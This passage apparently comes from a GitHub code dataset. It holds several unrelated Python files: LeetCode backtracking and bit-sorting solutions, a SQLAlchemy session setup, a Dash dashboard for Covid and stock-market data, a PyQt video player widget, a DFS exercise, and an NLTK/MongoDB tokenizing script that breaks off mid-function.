combinationSum2(self, candidates, target):\n solution = []\n self.dfs(solution, [], 0, sorted(candidates), target)\n return solution\n\n def dfs(self, res, temp, start, candidates, target):\n if target < 0:\n return\n elif target == 0:\n res.append(temp[:])\n for i in range(start, len(candidates)):\n if i > start and candidates[i] == candidates[i - 1]:\n continue\n temp.append(candidates[i])\n self.dfs(res, temp, i + 1, candidates, target - candidates[i])\n temp.pop()\n\n'''\nSuccess\nDetails \nRuntime: 96 ms, faster than 37.34% of Python online submissions for Combination Sum II.\nMemory Usage: 10.9 MB, less than 17.84% of Python online submissions for Combination Sum II.\n172 / 172 test cases passed.\nStatus: Accepted\nRuntime: 96 ms\nMemory Usage: 10.9 MB\n\nNext challenges:\nThird Maximum Number\nFind All Numbers Disappeared in an Array\nMaximum Width Ramp\n\nRelated topics: Array, Backtracking\nSimilar Questions: Combination Sum\n'''\n","repo_name":"KunyiLiu/algorithm_problems","sub_path":"kangli/leetcode/backtracking/combination_sum_ii.py","file_name":"combination_sum_ii.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74420517034","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nSQLALCHEMY_DATABASE_URI = 'postgresql://postgres:admin@172.18.0.2/social_media'\nengine = create_engine(SQLALCHEMY_DATABASE_URI, pool_size=20, max_overflow=0)\nSessionLocal = sessionmaker(bind=engine)\nBase = declarative_base()\n\nfrom database.models import *\n\n\n# Генератор подключений\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n except Exception:\n db.rollback()\n raise\n finally:\n 
\n db.close()\n\n","repo_name":"javlking/fastapi_social_media","sub_path":"database/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26216150201","text":"# https://leetcode.com/problems/sort-integers-by-the-number-of-1-bits/\nclass Solution:\n def sortByBits(self, arr: List[int]) -> List[int]:\n def countOne(x):\n cnt = 0\n while x != 0:\n x = (x & x - 1)\n cnt += 1\n return cnt\n\n ap = list(map(lambda x: (countOne(x), x), arr))\n # tuples sort by each key, one after another\n ap.sort()\n res = list(map(lambda x: x[1], ap))\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/1001-1500/1356_sort-integers-by-the-number-of-1-bits_1_AC.py","file_name":"1356_sort-integers-by-the-number-of-1-bits_1_AC.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"43978529363","text":"from typing import List, Dict\n\nimport logging\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nimport pandas as pd\nimport numpy as np\nimport plotly.graph_objs as go\n# from dash.dependencies import Input, Output\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import ClientsideFunction, Input, Output, State\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import r2_score\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\n\nfrom model import get_doubling_time_ts_df, corona_country_data, corona_table_data\nfrom view import (\n layout_parent,\n app_layout,\n line_graph,\n GRAY,\n GRAY_TRANSP,\n get_color,\n title_mapping,\n)\nfrom view.utils import registered_popovers\n\nexternal_scripts = ['/assets/style.css']\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig()\nlogger.setLevel(logging.INFO)\n# this is the application/server\napp = dash.Dash(\n __name__,\n meta_tags=[{\"name\": \"viewport\", \"content\": \"width=device-width\"}],\n external_stylesheets=[dbc.themes.LUX], \n # external_scripts=external_scripts\n)\nserver = app.server\napp.layout = app_layout\napp.title = 'Covid-19 and Stock Market Analysis'\n\n\n# dfrel = pd.read_csv(\"stock_reliance.csv\")\n# df = pd.read_csv(\"stock_data.csv\")\ndf = pd.read_csv(\"stock_for_covid.csv\")\ndf2 = pd.read_csv(\"dataset_Facebook.csv\", sep=\";\")\n\ndf_ml = df2.copy()\n\nlb_make = LabelEncoder()\ndf_ml[\"Type\"] = lb_make.fit_transform(df_ml[\"Type\"])\ndf_ml = df_ml.fillna(0)\n\nX = df_ml.drop(['like'], axis=1).values\nY = df_ml['like'].values\n\nX = StandardScaler().fit_transform(X)\n\nX_Train, X_Test, Y_Train, Y_Test = train_test_split(X, Y, test_size = 0.30, random_state = 101)\n\nrandomforest = RandomForestRegressor(n_estimators=500,min_samples_split=10)\nrandomforest.fit(X_Train,Y_Train)\n\np_train = randomforest.predict(X_Train)\np_test = randomforest.predict(X_Test)\n\ntrain_acc = r2_score(Y_Train, p_train)\ntest_acc = r2_score(Y_Test, p_test)\n\n# app.layout = html.Div([html.H1(\"Stock Market Impacted due to Lockdown\", style={\"textAlign\": \"center\"}), dcc.Markdown('''\n# Welcome to my Plotly (Dash) Data Science interactive dashboard. In order to create this dashboard, two different datasets have been used. The first one is the [Huge Stock Market Dataset by Boris Marjanovic](https://www.kaggle.com/borismarjanovic/price-volume-data-for-all-us-stocks-etfs)
\n# and the second one is the [Facebook metrics Data Set by Moro, S., Rita, P., & Vala, B](https://archive.ics.uci.edu/ml/datasets/Facebook+metrics). This dashboard is divided into 3 main tabs. In the first one you can choose with which other companies to compare Facebook Stock Prices to analyse main trends.\n# Using the second tab, you can analyse the distributions of each of the Facebook Metrics Data Set features. Particular interest is on how paying to advertise posts can boost posts visibility. Finally, in the third tab a Machine Learning analysis of the considered datasets is proposed. \n# All the data displayed in this dashboard is fetched, processed and updated using Python (e.g. ML models are trained in real time!).\n# ''') ,\n# dcc.Tabs(id=\"tabs\", children=[\n# dcc.Tab(label='Stock Prices', children=[\n# html.Div([html.H1(\"Dataset Introduction\", style={'textAlign': 'center'}),\n# dash_table.DataTable(\n# id='table',\n# columns=[{\"name\": i, \"id\": i} for i in df.columns],\n# data=df.iloc[0:5,:].to_dict(\"rows\"),\n# ),\n# html.H1(\"Facebook Stocks High vs Lows\", style={'textAlign': 'center', 'padding-top': 5}),\n# dcc.Dropdown(id='my-dropdown',options=[{'label': 'S&P 500', 'value': 'SNP'},{'label': 'Nifty Fifty', 'value': 'NFT'},{'label': 'Facebook', 'value': 'FB'},{'label': 'Microsoft', 'value': 'MCR'},{'label': 'Crude Oil', 'value': 'CRUD'},{'label': 'Reliance', 'value': 'REL'}],\n# multi=True,value=['FB'],style={\"display\": \"block\", \"margin-left\": \"auto\", \"margin-right\": \"auto\", \"width\": \"80%\"}),\n# dcc.Graph(id='highlow'), dash_table.DataTable(\n# id='table2',\n# columns=[{\"name\": i, \"id\": i} for i in df.describe().reset_index().columns],\n# data= df.describe().reset_index().to_dict(\"rows\"),\n# ),\n# html.H1(\"Facebook Market Volume\", style={'textAlign': 'center', 'padding-top': 5}),\n# dcc.Dropdown(id='my-dropdown2',options=[{'label': 'S&P 500', 'value': 'SNP'},{'label': 'Nifty Fifty', 'value': 'NFT'},{'label': 'Facebook', 'value': 'FB'},{'label': 'Microsoft', 'value': 'MCR'},{'label': 'Crude Oil', 'value': 'CRUD'},{'label': 'Reliance', 'value': 'REL'}],\n# multi=True,value=['FB'],style={\"display\": \"block\", \"margin-left\": \"auto\", \"margin-right\": \"auto\", \"width\": \"80%\"}),\n# dcc.Graph(id='volume'),\n# html.H1(\"Scatter Analysis\", style={'textAlign': 'center', 'padding-top': -10}),\n# dcc.Dropdown(id='my-dropdown3',\n# options=[{'label': 'S&P 500', 'value': 'SNP'},{'label': 'Nifty Fifty', 'value': 'NFT'},{'label': 'Facebook', 'value': 'FB'},{'label': 'Microsoft', 'value': 'MCR'},{'label': 'Crude Oil', 'value': 'CRUD'},{'label': 'Reliance', 'value': 'REL'}],\n# value= 'FB',\n# style={\"display\": \"block\", \"margin-left\": \"auto\", \"margin-right\": \"auto\", \"width\": \"45%\"}),\n# dcc.Dropdown(id='my-dropdown4',\n# options=[{'label': 'S&P 500', 'value': 'SNP'},{'label': 'Nifty Fifty', 'value': 'NFT'},{'label': 'Facebook', 'value': 'FB'},{'label': 'Microsoft', 'value': 'MCR'},{'label': 'Crude Oil', 'value': 'CRUD'},{'label': 'Reliance', 'value': 'REL'}],\n# value= 'MCR',\n# style={\"display\": \"block\", \"margin-left\": \"auto\", \"margin-right\": \"auto\", \"width\": \"45%\"}),\n# dcc.RadioItems(id=\"radiob\", value= \"High\", labelStyle={'display': 'inline-block', 'padding': 10},\n# options=[{'label': \"High\", 'value': \"High\"}, {'label': \"Low\", 'value': \"Low\"}, {'label': \"Volume\", 'value': \"Volume\"}],
'value': \"High\"}, {'label': \"Low\", 'value': \"Low\"} , {'label': \"Volume\", 'value': \"Volume\"}],\n# style={'textAlign': \"center\", }),\n# dcc.Graph(id='scatter')\n# ], className=\"container\"),\n# ])\n\n# @app.callback(Output('world_map', 'figure'))\n# def get_ world_map(selected_dropdown):\n# fig=go.Figure(data=go.Choropleth(\n# locations = df['CODE'],\n# z = df['Total Cases'],\n# text = df['Country'],\n# colorscale = 'Mint',\n# autocolorscale=False,\n# # reversescale=True,\n# # marker_line_color='darkgray',\n# marker_line_width=0.5,\n# # colorbar_tickprefix = '$',\n# colorbar_title = 'Total Cases',\n# ))\n\n# fig.update_layout(\n# title_text='Coronavirus on World Map',\n# geo=dict(\n# showframe=False,\n# showcoastlines=False,\n# projection_type='equirectangular'\n# ),\n# annotations = [dict(\n# x=0.55,\n# y=0.1,\n# xref='paper',\n# yref='paper',\n# showarrow = False\n# )]\n# )\n# return fig\n\n@app.callback(Output('highlow', 'figure'),\n [Input('my-dropdown', 'value')])\ndef update_graph(selected_dropdown):\n dropdown = {\"SNP\": \"S&P 500\",\"NFT\": \"Nifty Fifty\",\"FB\": \"Facebook\",\"MCR\": \"Microsoft\",\"CRUD\": \"Crude Oil\",\"REL\": \"Reliance\",}\n # {'label': 'S&P 500', 'value': 'SNP'},{'label': 'Nifty Fifty', 'value': 'NFT'},{'label': 'Facebook', 'value': 'FB'},{'label': 'Microsoft', 'value': 'MCR'},{'label': 'Crude Oil', 'value': 'CRUD'},{'label': 'Reliance', 'value': 'REL'}\n trace1 = []\n trace2 = []\n for stock in selected_dropdown:\n trace1.append(go.Scatter(x=df[df[\"Stock\"] == stock][\"Date\"],y=df[df[\"Stock\"] == stock][\"High\"],mode='lines',\n opacity=0.7,name=f'High {dropdown[stock]}',textposition='bottom center'))\n trace2.append(go.Scatter(x=df[df[\"Stock\"] == stock][\"Date\"],y=df[df[\"Stock\"] == stock][\"Low\"],mode='lines',\n opacity=0.6,name=f'Low {dropdown[stock]}',textposition='bottom center'))\n traces = [trace1, trace2]\n data = [val for sublist in traces for val in sublist]\n figure = {'data': data,\n 'layout': go.Layout(colorway=[\"#5E0DAC\", '#FF4F00', '#375CB1', '#FF7400', '#FFF400', '#FF0056'],\n height=600,title=f\"High and Low Prices for {', '.join(str(dropdown[i]) for i in selected_dropdown)} Over Time\",\n xaxis={\"title\":\"Date\",\n 'rangeselector': {'buttons': list([{'count': 1, 'label': '1M', 'step': 'month', 'stepmode': 'backward'},\n {'count': 6, 'label': '6M', 'step': 'month', 'stepmode': 'backward'},\n {'step': 'all'}])},\n 'rangeslider': {'visible': True}, 'type': 'date'},yaxis={\"title\":\"Price (USD)\"}, paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)')}\n return figure\n\n@app.callback(Output('volume', 'figure'),\n [Input('my-dropdown2', 'value')])\ndef update_graph(selected_dropdown_value):\n dropdown = {\"SNP\": \"S&P 500\",\"NFT\": \"Nifty Fifty\",\"FB\": \"Facebook\",\"MCR\": \"Microsoft\",\"CRUD\": \"Crude Oil\",\"REL\": \"Reliance\",}\n trace1 = []\n for stock in selected_dropdown_value:\n trace1.append(go.Scatter(x=df[df[\"Stock\"] == stock][\"Date\"],y=df[df[\"Stock\"] == stock][\"Volume\"],mode='lines',\n opacity=0.7,name=f'Volume {dropdown[stock]}',textposition='bottom center'))\n traces = [trace1]\n data = [val for sublist in traces for val in sublist]\n figure = {'data': data,\n 'layout': go.Layout(colorway=[\"#5E0DAC\", '#FF4F00', '#375CB1', '#FF7400', '#FFF400', '#FF0056'],\n height=600,title=f\"Market Volume for {', '.join(str(dropdown[i]) for i in selected_dropdown_value)} Over Time\",\n xaxis={\"title\":\"Date\",\n 'rangeselector': {'buttons': list([{'count': 1, 'label': '1M', 'step': 'month', 
\n {'count': 6, 'label': '6M', 'step': 'month', 'stepmode': 'backward'},\n {'step': 'all'}])},\n 'rangeslider': {'visible': True}, 'type': 'date'},yaxis={\"title\":\"Price (USD)\"}, paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)')}\n return figure\n\n@app.callback(Output('volume', 'figure'),\n [Input('my-dropdown2', 'value')])\ndef update_graph(selected_dropdown_value):\n dropdown = {\"SNP\": \"S&P 500\",\"NFT\": \"Nifty Fifty\",\"FB\": \"Facebook\",\"MCR\": \"Microsoft\",\"CRUD\": \"Crude Oil\",\"REL\": \"Reliance\",}\n trace1 = []\n for stock in selected_dropdown_value:\n trace1.append(go.Scatter(x=df[df[\"Stock\"] == stock][\"Date\"],y=df[df[\"Stock\"] == stock][\"Volume\"],mode='lines',\n opacity=0.7,name=f'Volume {dropdown[stock]}',textposition='bottom center'))\n traces = [trace1]\n data = [val for sublist in traces for val in sublist]\n figure = {'data': data,\n 'layout': go.Layout(colorway=[\"#5E0DAC\", '#FF4F00', '#375CB1', '#FF7400', '#FFF400', '#FF0056'],\n height=600,title=f\"Market Volume for {', '.join(str(dropdown[i]) for i in selected_dropdown_value)} Over Time\",\n xaxis={\"title\":\"Date\",\n 'rangeselector': {'buttons': list([{'count': 1, 'label': '1M', 'step': 'month', 'stepmode': 'backward'},\n {'count': 6, 'label': '6M', 'step': 'month', 'stepmode': 'backward'},\n {'step': 'all'}])},\n 'rangeslider': {'visible': True}, 'type': 'date'},yaxis={\"title\":\"Transactions Volume\"} , paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)')}\n return figure\n\n@app.callback(Output('scatter', 'figure'),\n [Input('my-dropdown3', 'value'), Input('my-dropdown4', 'value'), Input(\"radiob\", \"value\"),])\ndef update_graph(stock, stock2, radioval):\n dropdown = {\"SNP\": \"S&P 500\",\"NFT\": \"Nifty Fifty\",\"FB\": \"Facebook\",\"MCR\": \"Microsoft\",\"CRUD\": \"Crude Oil\",\"REL\": \"Reliance\",}\n radio = {\"High\": \"High Prices\", \"Low\": \"Low Prices\", \"Volume\": \"Market Volume\", }\n trace1 = []\n if (stock is None) or (stock2 is None):\n trace1.append(\n go.Scatter(x= [0], y= [0],\n mode='markers', opacity=0.7, textposition='bottom center'))\n traces = [trace1]\n data = [val for sublist in traces for val in sublist]\n figure = {'data': data,\n 'layout': go.Layout(colorway=['#FF7400', '#FFF400', '#FF0056'],\n height=600, title=f\"{radio[radioval]}\",\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)')}\n else:\n trace1.append(go.Scatter(x=df[df[\"Stock\"] == stock][radioval][-1000:], y=df[df[\"Stock\"] == stock2][radioval][-1000:],\n mode='markers', opacity=0.7, textposition='bottom center'))\n traces = [trace1]\n data = [val for sublist in traces for val in sublist]\n figure = {'data': data,\n 'layout': go.Layout(colorway=['#FF7400', '#FFF400', '#FF0056'],\n height=600,title=f\"{radio[radioval]} of {dropdown[stock]} vs {dropdown[stock2]} Over Time (1000 iterations)\",\n xaxis={\"title\": stock,}, yaxis={\"title\": stock2}, paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)')}\n return figure\n\n# Create callback for resizing the charts\n# app.clientside_callback(\n# ClientsideFunction(namespace=\"clientside\", function_name=\"resize\"),\n# Output(\"output-clientside\", \"children\"),\n# [Input(\"count_graph\", \"figure\")],\n# )\n\n\n@app.callback(\n Output(\"count_graph\", \"figure\"),\n [\n Input(\"countries\", \"value\"),\n Input(\"data_source\", \"value\"),\n Input(\"line_graph_view\", \"value\"),\n Input(\"line_graph_scaler\", \"value\"),\n Input(\"date_slider\", \"value\"),\n Input(\"count_graph\", \"hoverData\"),\n ],\n)\ndef update_time_series(\n countries: List[str],\n data_source: str,\n line_graph_view: str,\n line_graph_scaler: str,\n date_slider: int,\n hover_data: dict,\n) -> Dict[str, List]:\n\n if line_graph_view == \"trajectory\":\n return update_trajectory_chart(\n countries, data_source, line_graph_scaler, date_slider, hover_data,\n )\n\n # special filtering for viewing \"from n days setting\"\n if line_graph_view in [\"since_100\", \"since_10\"]:\n df = get_doubling_time_ts_df(countries, line_graph_view, data_source)\n countries += list(filter(lambda x: \"double\" in x, df.index))\n x_vals = df.columns\n else:\n df = corona_country_data[data_source][line_graph_view].copy()\n x_vals = [x[:-3] for x in df.columns]\n\n # populate the data output field\n data = []\n for country in countries:\n if country in df.index:\n data.append(\n dict(\n type=\"scatter\",\n mode=\"lines\",\n name=country,\n showlegend=True if \"double\" not in country else False,\n y=df.loc[country],\n x=x_vals,\n line=dict(shape=\"spline\", smoothing=\"2\", color=get_color(country),),\n )\n )\n\n title = f\"{title_mapping[data_source]} - {title_mapping[line_graph_view]}\"\n layout_count = {\n **layout_parent,\n \"title\": title,
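\n # note: 'showspikes' draws hover crosshair guides; both axes below deliberately share the same spike settings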
\"xaxis\": {\n \"title\": \"Development Time (days)\",\n \"showspikes\": True,\n \"spikethickness\": 1,\n },\n \"yaxis\": {\n \"title\": f\"Count - {title_mapping[line_graph_scaler]}\",\n \"type\": line_graph_scaler,\n \"showspikes\": True,\n \"spikethickness\": 1,\n },\n \"margin\": {\"l\": 70, \"b\": 70, \"r\": 10, \"t\": 50},\n }\n\n return dict(data=data, layout=layout_count)\n\n\ndef update_trajectory_chart(\n countries: List[str],\n data_source: str,\n line_graph_scaler: str,\n date_slider: int,\n hover_data,\n) -> Dict[str, List]:\n\n country_on_hover = None\n if hover_data:\n # divide by two because we are graphing two traces at at time (line and scatter)\n idx = hover_data[\"points\"][0][\"curveNumber\"] // 2\n country_on_hover = countries[idx]\n\n # ts data to operate on\n df_cumulative = corona_country_data[data_source][\"cumulative\"]\n df_daily = corona_country_data[data_source][\"daily_increase\"]\n date = pd.to_datetime(df_cumulative.columns[date_slider])\n\n # popualte the time series data output field.\n # if the date and minimum number of cases is exceeded, then plot the scatter and line trace.\n data = []\n for country in countries:\n if country in df_cumulative.index:\n x = df_cumulative.loc[country]\n y = df_daily.loc[country]\n index = (pd.to_datetime(x.index) <= date) & (x > 50)\n trace_color = (\n get_color(country) if country == country_on_hover else GRAY_TRANSP\n )\n if True in list(index):\n data.append(\n dict(\n type=\"scatter\",\n mode=\"lines\",\n name=country,\n y=y[index],\n x=x[index],\n customdata=country,\n line=dict(shape=\"spline\", smoothing=\"2\", color=trace_color),\n showlegend=False,\n )\n )\n data.append(\n dict(\n type=\"scatter\",\n y=[y[index].iloc[-1]],\n x=[x[index].iloc[-1]],\n text=country,\n name=country,\n mode=\"markers+text\",\n textposition=\"top center\",\n showlegend=False,\n marker={\"size\": 8, \"color\": get_color(country),},\n ),\n )\n\n title = f\"Trajectory of Covid {title_mapping[data_source]} {df_cumulative.columns[date_slider - 1]}\"\n layout_count = {\n **layout_parent,\n \"autosize\": False,\n \"title\": title,\n \"xaxis\": {\n \"title\": \"Total Count\",\n \"type\": line_graph_scaler,\n \"showspikes\": True,\n \"spikethickness\": 1,\n },\n \"yaxis\": {\n \"title\": \"Daily Increase\",\n \"type\": line_graph_scaler,\n \"showspikes\": True,\n \"spikethickness\": 1,\n },\n \"margin\": {\"l\": 70, \"b\": 70, \"r\": 10, \"t\": 50},\n }\n\n return dict(data=data, layout=layout_count)\n\n\n@app.callback(\n Output(\"scatter_plot\", \"figure\"),\n [\n Input(\"countries\", \"value\"),\n Input(\"scatter_x_data\", \"value\"),\n Input(\"scatter_y_data\", \"value\"),\n Input(\"scatter_x_scaler\", \"value\"),\n Input(\"scatter_y_scaler\", \"value\"),\n Input(\"min_cases_thresh\", \"value\"),\n Input(\"show_labels\", \"value\"),\n ],\n)\ndef update_scatter_plot(\n countries: List[str],\n x_axis: str,\n y_axis: str,\n x_scaler: str,\n y_scaler: str,\n min_cases_thresh: str,\n show_labels: str,\n):\n logger.info(corona_table_data[\"Total Cases\"][0])\n corona_table_data[\"Total Cases\"] = corona_table_data[\"Total Cases\"].replace(',', '')\n logger.info(corona_table_data[\"Total Cases\"][0]) \n df = corona_table_data[corona_table_data[\"Total Cases\"].astype(float) > float(min_cases_thresh)]\n names = df[\"Country\"] if show_labels else countries\n colors = list(\n map(lambda x: get_color(x) if x in countries else GRAY, df[\"Country\"])\n )\n data = [\n dict(\n type=\"scatter\",\n y=df[y_axis],\n x=df[x_axis],\n text=names,\n 
name=df[\"Country\"],\n mode=\"markers+text\",\n textposition=\"top center\",\n showlegend=False,\n marker={\n \"size\": 8,\n \"opacity\": 1,\n \"line\": {\"width\": 0.5, \"color\": \"white\"},\n \"color\": colors,\n },\n )\n ]\n\n layout_scatter = {\n **layout_parent,\n \"title\": f\"{y_axis} vs. {x_axis}\",\n \"xaxis\": {\n \"title\": f\"{x_axis} {title_mapping[x_scaler]}\",\n \"type\": x_scaler,\n \"showspikes\": True,\n \"spikethickness\": 1,\n },\n \"yaxis\": {\n \"title\": f\"{y_axis} {title_mapping[y_scaler]}\",\n \"type\": y_scaler,\n \"showspikes\": True,\n \"spikethickness\": 1,\n },\n \"margin\": {\"l\": 70, \"b\": 70, \"r\": 10, \"t\": 50},\n \"textposition\": \"top center\",\n }\n return dict(data=data, layout=layout_scatter)\n\n\n@app.callback(\n [Output(\"data_table\", \"selected_rows\"), Output(\"data_table\", \"data\")],\n [Input(\"countries\", \"value\")],\n)\ndef update_table_selection_from_country_dropdown(countries: List[str]):\n \"\"\"Update the Data Table selection and sorting, based on the country dropdown.\"\"\"\n\n # move selected countries to top of table\n df = corona_table_data.copy()\n df[\"new\"] = list(range(1, len(df) + 1))\n df.loc[df[df.Country.isin(countries)].index, \"new\"] = 0\n df = df.sort_values([\"new\", \"Total Cases\"], ascending=[True, False])\n df = df.drop(\"new\", axis=1)\n return [\n list(range(len(countries))),\n df.to_dict(\"records\"),\n ]\n\n\n@app.callback(\n dash.dependencies.Output(\"line_graph_view\", \"options\"),\n [dash.dependencies.Input(\"data_source\", \"value\")],\n)\ndef hide_cases_since_dropdowns_if_case_fatalit_set(value: str):\n if value == \"case_fatality\":\n return line_graph.line_graph_view_options[:3]\n else:\n return line_graph.line_graph_view_options\n\n\n@app.callback(\n dash.dependencies.Output(\"date_slider_div\", \"style\"),\n [dash.dependencies.Input(\"line_graph_view\", \"value\")],\n)\ndef hide_date_slider_if_trajectory_not_set(value: str):\n if value == \"trajectory\":\n return {\"display\": \"block\"}\n else:\n return {\"display\": \"none\"}\n\n\n# dynamically create callbacks for each about-info popover we created\ndef _toggle_popover(n, is_open):\n if n:\n return not is_open\n return is_open\n\n\nfor p in registered_popovers:\n app.callback(\n Output(f\"popover-{p}\", \"is_open\"),\n [Input(f\"popover-target-{p}\", \"n_clicks\")],\n [State(f\"popover-{p}\", \"is_open\")],\n )(_toggle_popover)\n\nif __name__ == \"__main__\":\n # app.run_server(debug=True, port=8001)\n app.run_server(debug=True, use_reloader=True)\n","repo_name":"jadhavsujit4/Data-Visualisation-CovidAndStockMarket","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":21570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15342801670","text":"import logging as log\n\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtMultimedia import QMediaPlayer, QMediaContent\nfrom PyQt5.QtMultimediaWidgets import QVideoWidget\nfrom PyQt5.QtWidgets import QSizePolicy, QWidget\n\nfrom Classes.descriptors import FuncDescriptor\nfrom Classes.logging import exp_logger\n\n\nclass VideoPlayer(QVideoWidget):\n onVideoStop = FuncDescriptor()\n onVideoStart = FuncDescriptor()\n onVideoPause = FuncDescriptor()\n\n def __init__(self, parent: QWidget):\n super().__init__(parent=parent)\n self.mediaPlayer = QMediaPlayer(None, QMediaPlayer.VideoSurface)\n self.mediaPlayer.setVideoOutput(self)\n self.mediaPlayer.stateChanged.connect(self.onStateChanged)\n 
self.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)\n self._video_path = None\n\n @property\n def video_path(self):\n return self._video_path\n\n @video_path.setter\n def video_path(self, value):\n log.debug(\" _video_path set to {}\".format(value))\n self._video_path = value\n self.q_url = QUrl.fromLocalFile(self._video_path)\n self.mediaPlayer.setMedia(QMediaContent(self.q_url))\n\n def showEvent(self, event: QtGui.QShowEvent):\n super().showEvent(event)\n exp_logger.info(f\"Playing video: {self.video_path}\")\n self.mediaPlayer.play()\n\n def onStateChanged(self):\n \"\"\"\n 0 - StoppedState\n 1 - PlayingState\n 2 - PausedState\n \"\"\"\n state = self.mediaPlayer.state()\n if state == 0:\n self.onVideoStop()\n elif state == 1:\n self.onVideoStart()\n elif state == 2:\n self.onVideoPause()\n else:\n raise ValueError(\"Unknown state {}\".format(state))\n\n def closeEvent(self, QCloseEvent):\n super().closeEvent(QCloseEvent)\n log.debug(\"Close {}\".format(self))\n\n","repo_name":"SiegfriedWagner/Matrix-presenter","sub_path":"View/Widgets/videoplayer.py","file_name":"videoplayer.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32160278164","text":"import sys\r\nsys.setrecursionlimit(10**9)\r\ninput = sys.stdin.readline\r\n\r\nn, m, l = map(int,input().split())\r\ngraph = [[] for _ in range(n+1)]\r\nvisited = [0] * (n+1)\r\nfor i in range(m):\r\n u, v = map(int,input().split())\r\n graph[u].append(v)\r\n graph[v].append(u)\r\ncnt = 1\r\n\r\ndef dfs(x):\r\n global cnt\r\n visited[x] = cnt\r\n graph[x].sort()\r\n for i in graph[x]:\r\n if not visited[i]:\r\n cnt += 1\r\n dfs(i)\r\ndfs(l)\r\n\r\nfor i in range(1,n+1):\r\n print(visited[i])\r\n\r\n","repo_name":"wnsgml7267/cote-practice","sub_path":"백준/Silver/24479. 
알고리즘 수업 - 깊이 우선 탐색 1/알고리즘 수업 - 깊이 우선 탐색 1.py","file_name":"알고리즘 수업 - 깊이 우선 탐색 1.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12979612275","text":"\"\"\" Natural Language Toolkit - nltk in python\"\"\"\n\n\"\"\" Simple things to do using NLTK\"\"\"\nimport pprint\nimport nltk\nimport json\nimport numpy as np\nimport pandas as pd\nfrom nltk.tokenize import word_tokenize\nfrom pymongo import MongoClient\nfrom nltk.stem import PorterStemmer, SnowballStemmer, LancasterStemmer\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer,CountVectorizer\n\n#Splitting the training and test data \nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import accuracy_score\n\n#hstack for concatenating 2 sparse matrix horizontally\nfrom scipy.sparse import hstack\nimport scipy.sparse\n# from nltk.corpus import words\n# nltk.download('stopwords')\n# nltk.download('punkt')\n\nclient = MongoClient(\"localhost\", 27017)\n\nwith open(\"prontos.json\", \"r\") as data_file: \n data = json.load(data_file)\n\ndb = client[\"database_test\"] # creating a database inside the mongodb client\ncollection = db[\"collection_test\"] #then create a new collection in that database\n\n\"\"\" TASK 1\"\"\"\n\ndef desc_tokenize(client:MongoClient):\n db = client[\"database_test\"]\n collection = db[\"collection_test\"]\n elem = collection.find({})# variable with all the elements inside the collection\n tokens_list = [] # creating an empty array for the tokenized data \n for doc in elem: # for every document inside the collection \n # print(doc[\"description\"])\n if isinstance(doc[\"description\"], (str, bytes)): # verify if the 'description' field from the collection is of type \"string or bytes\"\n tokens = word_tokenize(doc[\"description\"]) # used the word_tokenize() method on the ['description'] field to tokenize every words in that field\n collection.update_one({\"_id\": doc[\"_id\"]}, {'$set': {\"tokenized_description\": tokens}}) # here we updated the collection for each string in the 'description' field\n tokens_list.append(tokens) # here we added everything that was tokenized in the empty array we created\n \n return tokens_list \n\ntokens = desc_tokenize(client)\n# print(tokens)\n# We can see the result in the mongosh , using the command : db.collection.find() \n# or to extract one single field we can use the projection : db.collection.find({}\n# {\"description\": 1}) is a projection object that includes only the description field in the query results.\n# # the value 1 in the projection object specifies that the field should be included in the results\n\n\"\"\"TASK 2 :: Apply different stemming methods on the tokens \"\"\"\n\n\"\"\"Method 1\"\"\"\ndef stem_tokens():\n ps = PorterStemmer()\n stems_list = [] # this is a empty list to append all the stemmed data\n db = client[\"database_test\"]\n collection = db[\"collection_test\"]\n stops = set(stopwords.words(\"english\")) # set of english stopwords\n for doc in collection.find({}):\n description = doc['description']\n words = [tok for tok in description.split() if tok.isalpha() and tok.lower() not in stops]\n stem = [ps.stem(tok) for tok in words] \n collection.update_one({\"_id\": doc[\"_id\"]}, {'$set': {'tokenized_description': ' '.join(stem)}})\n # stems_list.append(stem) # the correct one to 
